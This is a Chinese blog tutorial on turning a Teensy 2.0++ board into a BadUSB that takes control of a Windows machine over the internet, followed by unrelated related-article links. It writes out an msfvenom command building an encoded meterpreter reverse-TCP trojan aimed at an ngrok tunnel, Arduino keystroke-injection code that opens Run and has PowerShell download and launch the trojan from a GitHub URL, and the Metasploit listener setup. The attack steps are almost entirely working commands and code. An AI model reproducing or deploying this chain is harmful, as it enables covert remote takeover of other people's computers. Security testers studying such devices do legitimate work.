渗透利器-BadUSB 控制外网主机详解 Teensy2.0++
准备工作
- 一块 Teensy2.0++ 的板子(淘宝一搜就有)
- Arduino编译器
- 1.8.7版本下载连接:arduino下载地址
- Teensy插件
- 下载连接:Teensy下载地址
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ryJkNHH9-1580900714737)(http://da1sy.github.io/assets/images/9-Yue/teensy-1.jpg)]
1.下载好arduino后直接解压
⚡ /home/da1sy/arduino-1.8.7# ./arduino
2.安装Teensy插件
⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64
注意将插件安装到arduino的解压目录下
3.arduino修改配置
打开软件后将 工具 下配置修改如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qt73hPFf-1580900714743)(http://da1sy.github.io/assets/images/9-Yue/teensy-2.jpg)]
4.利用ngrok实现内网穿透
在https://www.ngrok.cc/ 注册账号后开通tcp隧道
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p0rQ6pAB-1580900714746)(http://da1sy.github.io/assets/images/9-Yue/teensy-3.png)]
下载客户端
⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-260TmEzU-1580900714747)(http://da1sy.github.io/assets/images/9-Yue/teensy-4.png)]
5.利用msfvenom生成windows端木马
⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe
lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)
最后将生成的木马放到github项目上实现远程下载
6.编辑arduino代码
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
//将连接的地址改为自己github的地址
void setup() {
delay(5000);
omg(command1);
delay(15000);
omg(command2);
}
void loop() {}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.println(SomeCommand);
}
编辑好后点验证,然后插入Teensy板子,最后按一下板子上的按钮完成上传
7.metasploit开启监听
⚡ /home/da1sy/# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1
msf exploit(multi/handler) > set lport 6666 //ngrok开通隧道时填写的本地地址与端口号
msf exploit(multi/handler) > exploit
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NvFrtRgA-1580900714750)(http://da1sy.github.io/assets/images/9-Yue/teensy-5.png)]
8.最后对目标插入badusb
效果图如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gMBGeM7J-1580900714752)(http://da1sy.github.io/assets/images/9-Yue/teensy-s1.gif)]
监听端
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PVLFqHTr-1580900714759)(http://da1sy.github.io/assets/images/9-Yue/teensy-s2.gif)]
最后反弹的会话好像是出现了毛病,不过总体上嘛 问题不大
一些其他的代码
有时间再补
渗透利器-BadUSB 控制外网主机详解 Teensy2.0++的更多相关文章
- 外网主机远程ssh局域网Linux
最近,公司有台配置极高的主机盒子(i7,32G,512G),组长让我装上kali,平时渗透测试时可以用,其余时间归我了,这么高配置的机器,怎么舍得让它吃灰呢 .所以我就去研究了一下,如何远程访问局域网 ...
- 外网主机访问虚拟机下的Web服务器_服务器应用_Linux公社-Linux系统门户网站
body{ font-family: "Microsoft YaHei UI","Microsoft YaHei",SimSun,"Segoe UI& ...
- 2013款Mac Pro“神秘”主机详解
2013款Mac Pro"神秘"主机详解 自2013年12月下旬新款Mac Pro在美国发布以来,经过一个月的等待终于在国内已到货,笔者亲自测试了这个号称"神秘" ...
- 给Ambari集群里安装可视化分析利器工具Hue步骤(图文详解)
扩展博客 以下,是我在手动的CDH版本平台下,安装Hue. CDH版本大数据集群下搭建Hue(hadoop-2.6.0-cdh5.5.4.gz + hue-3.9.0-cdh5.5.4.tar.gz) ...
- Struts2使用Interceptor实现权限控制的应用实例详解
Struts2使用Interceptor实现权限控制的应用实例详解 拦截器:是Struts2框架的核心,重点之重.因此,对于我们要向彻底学好Struts2.0.读源码和使用拦截器是必不可少的.少说了. ...
- “全栈2019”Java第六十九章:内部类访问外部类成员详解
难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...
- 给Clouderamanager集群里安装可视化分析利器工具Hue步骤(图文详解)
扩展博客 以下,是我在手动的CDH版本,安装Hue. CDH版本大数据集群下搭建Hue(hadoop-2.6.0-cdh5.5.4.gz + hue-3.9.0-cdh5.5.4.tar.gz)(博主 ...
- C#依赖注入控制反转IOC实现详解
原文:C#依赖注入控制反转IOC实现详解 IOC的基本概念是:不创建对象,但是描述创建它们的方式.在代码中不直接与对象和服务连接,但在配置文件中描述哪一个组件需要哪一项服务.容器负责将这些联系在一起. ...
- 官网实例详解-目录和实例简介-keras学习笔记四
官网实例详解-目录和实例简介-keras学习笔记四 2018-06-11 10:36:18 wyx100 阅读数 4193更多 分类专栏: 人工智能 python 深度学习 keras 版权声明: ...
随机推荐
- one_day_one_linuxCmd---光标快捷操作
<坚持每天学习一个 linux 命令,今天我们来学习 切换光标的常用命令> 摘要:最近经常使用 xshell 软件来远程连接各种机器,在 bin/bash 下输入各种命令,因为都是一些非常 ...
- this深度面试题2
var name = "windows" var object = { name:"object", show:function(){ return funct ...
- mysql my.cnf常用的配置
[mysqld]basedir = /usr/local/mysql/datadir = /usr/local/mysql/dataport = 3306pid-file = /usr/local/m ...
- EOF是什么?(笔记)
一.参考文章 1.EOF是什么?(阮一峰网络日志) 2.Linux 中的 EOF 到底是什么 二.知识点 1.EOF 定义在 /usr/include/stdio.h 文件中: 从上面 EOF 的定义 ...
- Python批量重命名文件
批量替换文件名中重复字符: # -*- coding: UTF-8 -*- import os path = raw_input("请输入文件夹路径:") oldname = ra ...
- EXCEL快速实现下拉计算快捷键
ctrl + shift + 方向键,,选择要填充的范围,,然后ctrl + d
- Linux 下载安装
安装教程:https://www.runoob.com/linux/linux-install.html Linux图形界面与命令行界面切换https://blog.csdn.net/ab522628 ...
- numpy(一)
ndarray np的一个核心类,它描述了相同类型的“项目”集合.可以使用例如N个整数来索引项目.每个项目占用相同大小的内存块, 并且所有块都以完全相同的方式解释. 如何解释数组中的每个项目由单独的数 ...
- python-day8爬虫基础之数据存储
数据存储,在爬虫中也是十分的重要,因为我们要把我们想要的数据保存到本地,其中最简单直接的就是保存为文件文本,比如:TXT.JSON.CSV等等,除此之外,我们还可以将其保存到数据库中,常见的数据库类型 ...
- Python这五个坑,80%你不知道(对的,五个你知道1个就达到一般水平了)
1 含单个元素的元组 Python中有些函数的参数类型为元组,其内有1个元素,这样创建是错误的: c = (5) # NO! 它实际创建一个整型元素5,必须要在元素后加一个逗号: ! c = (5,) ...